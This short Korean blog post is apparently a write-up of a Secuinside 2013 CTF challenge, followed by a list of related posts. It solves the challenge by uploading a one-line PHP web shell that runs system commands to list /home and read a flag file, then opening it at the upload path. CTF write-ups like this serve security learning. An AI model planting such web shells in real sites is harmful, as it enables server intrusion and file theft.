300점 치고는 너무 쉬운 문제였다.
그냥 php 쉘파일 업로드해서 확인하면 된다.
아래와 같은 파일을 업로드한다.
<? system("ls -al /home/"); system("cat /home/[???? 기억이 안남]/flags"); ?> <br/> <br/> <br/> <br/> ...
그 후에,
./uploads/[ip encoding]/파일이름
로 접근하면 끝.
'Computer Security > CTF' 카테고리의 다른 글
| [Secuinside 2013] 127.0.0.1, write up (0) | 2013.05.26 |
|---|---|
| [Secuinside 2013] PE time (0) | 2013.05.26 |
| [Secuinside 2013] banking, write up (1) | 2013.05.26 |
| [Secuinside 2013] givemeshell, write up (2) | 2013.05.26 |
| [Secuinside 2013] Bigfile of secret, write up (0) | 2013.05.26 |